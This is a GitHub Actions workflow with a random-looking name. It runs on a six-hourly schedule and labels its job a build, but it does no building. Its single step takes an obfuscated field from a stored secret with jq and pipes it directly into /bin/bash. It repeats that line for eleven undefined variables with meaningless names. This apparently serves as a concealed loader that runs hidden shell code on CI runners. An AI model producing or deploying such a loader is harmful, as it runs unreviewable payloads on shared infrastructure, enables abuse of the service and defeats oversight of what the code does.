name: duanqirui2603

on:
  workflow_dispatch:
  schedule:
    - cron: '14 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanqirui2603
        env:
          p28: ${{ secrets.p28 }}
        run: |
          echo $p28 | jq -r .ioytl53372 | /bin/bash
          echo $np83 | jq -r .czk549 | /bin/bash
          echo $duc58459 | jq -r .ifq24 | /bin/bash
          echo $ss14 | jq -r .o99 | /bin/bash
          echo $jlt65 | jq -r .mziyz70 | /bin/bash
          echo $ci64 | jq -r .owxk6588 | /bin/bash
          echo $bzat7313 | jq -r .m9 | /bin/bash
          echo $fle05 | jq -r .eivy5 | /bin/bash
          echo $banj8 | jq -r .qmlee12 | /bin/bash
          echo $adjn635 | jq -r .ysz47703 | /bin/bash
          echo $iyl496 | jq -r .jz655 | /bin/bash
          echo $ht9 | jq -r .iep9 | /bin/bash

